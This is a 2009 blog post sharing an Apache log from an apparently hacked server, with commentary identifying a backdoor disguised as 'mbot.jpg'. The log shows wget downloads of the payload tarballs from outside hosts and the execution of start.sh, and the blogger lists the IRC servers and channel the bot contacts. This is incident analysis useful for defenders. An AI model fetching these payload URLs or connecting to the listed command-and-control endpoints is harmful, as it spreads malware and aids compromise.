Thursday, July 23, 2009

hacked server Apache log

Thanks to ezgranny420 for posting nearly 3500 lines of this apache log file showing what appears to be a successful hack of a webserver. At line 3162 you'll notice the output of a successful wget of a file named mbot.jpg. This file is actually not an image, but instead a tarball containing what appears to be a backdoor that communicates over IRC. For the curious, a quick examination shows the following interesting servers and channels:

SERVER eu.undernet.org 6667
SERVER us.undernet.org 7000
SERVER 161.53.178.240 6667

CHANNEL #wh-ro


Posted by ezgranny420 on Wed 22 Jul 21:45
  1. [Tue Apr 28 20:21:44 2009] [notice] SELinux policy enabled; httpd running as context root:system_r:httpd_t
  2. [Tue Apr 28 20:21:44 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  3. [Tue Apr 28 20:21:45 2009] [notice] Digest: generating secret for digest authentication ...
  4. [Tue Apr 28 20:21:45 2009] [notice] Digest: done
  5. [Tue Apr 28 20:21:45 2009] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
  6. [Tue Apr 28 20:21:45 2009] [notice] Apache configured -- resuming normal operations
  7. [Tue Apr 28 20:24:32 2009] [notice] caught SIGTERM, shutting down
  8. [Tue Apr 28 20:26:55 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
  9. [Tue Apr 28 20:26:56 2009] [notice] Digest: generating secret for digest authentication ...
  10. [Tue Apr 28 20:26:56 2009] [notice] Digest: done
  11. [Tue Apr 28 20:26:57 2009] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
  12. [Tue Apr 28 20:26:57 2009] [notice] Apache configured -- resuming normal operations
  13. [Tue Apr 28 22:00:01 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  14. [Tue Apr 28 22:00:13 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  15. [Tue Apr 28 22:13:14 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  16. [Tue Apr 28 22:27:44 2009] [error] [client 219.153.66.61] File does not exist: /var/www/html/intl
  17. [Tue Apr 28 22:34:05 2009] [notice] caught SIGTERM, shutting down
skip forward to line 3159...
  1. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  2. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  3. [Thu Jul 09 03:05:22 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  4. --03:08:12--  http://members.lycos.co.uk/carbalano/mbot.jpg
  5. Resolving members.lycos.co.uk... 213.131.252.251
  6. Connecting to members.lycos.co.uk|213.131.252.251|:80... connected.
  7. HTTP request sent, awaiting response... 200 OK
  8. Length: unspecified [image/jpeg]
  9. Saving to: `mbot.jpg'
  10.  
  11.     0K .......... .......... .......... .......... .......... 94.0K
  12.    50K .......... .......... .......... .......... ..........  337K
  13.   100K .......... .......... .......... .......... .           316K=0.8s
  14.  
  15. 03:08:14 (174 KB/s) - `mbot.jpg' saved [144693]
  16.  
  17. ./start.sh: line 1: /#bin/bash: No such file or directory
  18. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  19. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  20. [Thu Jul 09 05:39:10 2009] [error] [client 207.182.158.194] Invalid URI in request GET HTTP/1.1 HTTP/1.1
  21. --05:40:43--  http://w.ftp.sh/images/db/m.tar.gz
  22. Resolving w.ftp.sh... 125.206.123.67
  23. Connecting to w.ftp.sh|125.206.123.67|:80... connected.
  24. HTTP request sent, awaiting response... 200 OK
  25. Length: 142538 (139K) [application/x-gzip]
  26. Saving to: `m.tar.gz'
  27.  
  28.     0K .......... .......... .......... .......... .......... 35% 78.1K 1s
  29.    50K .......... .......... .......... .......... .......... 71%  291K 0s
  30.   100K .......... .......... .......... .........            100% 1.13M=0.8s
  31.  
  32. 05:40:45 (164 KB/s) - `m.tar.gz' saved [142538/142538]
  33.  
  34. tar: .m/start.sh: time stamp 2009-07-09 05:41:06 is 21 s in the future
  35. tar: .m/1: time stamp 2009-07-09 05:42:04 is 79 s in the future
  36. tar: .m: time stamp 2009-07-09 05:49:06 is 501 s in the future
  37. --05:41:19--  http://w.ftp.sh/images/db/m.tar.gz
  38. Resolving w.ftp.sh... 125.206.123.67
  39. Connecting to w.ftp.sh|125.206.123.67|:80... connected.
  40. HTTP request sent, awaiting response... 200 OK
  41. Length: 142538 (139K) [application/x-gzip]
  42. Saving to: `m.tar.gz'
  43.  
  44.     0K .......... .......... .......... .......... .......... 35% 75.2K 1s
  45.    50K .......... .......... .......... .......... .......... 71%  288K 0s
  46.   100K .......... .......... .......... .........            100% 1.13M=0.9s
  47.  
  48. 05:41:20 (160 KB/s) - `m.tar.gz' saved [142538/142538]
  49.  
  50. tar: .m/1: time stamp 2009-07-09 05:42:04 is 44 s in the future
  51. tar: .m: time stamp 2009-07-09 05:49:06 is 466 s in the future
  52. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  53. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  54. [Thu Jul 09 06:11:27 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  55. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  56. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  57. [Thu Jul 09 10:13:47 2009] [error] [client 216.168.43.234] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  58. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  59. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  60. [Thu Jul 09 15:08:11 2009] [error] [client 85.214.153.253] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
  61. [Thu Jul 09 21:22:08 2009] [error] [client 88.255.202.60] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)


The paste: http://pastebin.com/m7122eed0
Bookmark this post with:
Posted by Chuck at 1:01 PM
Labels: , ,
blog comments powered by Disqus
Subscribe to: Post Comments (Atom)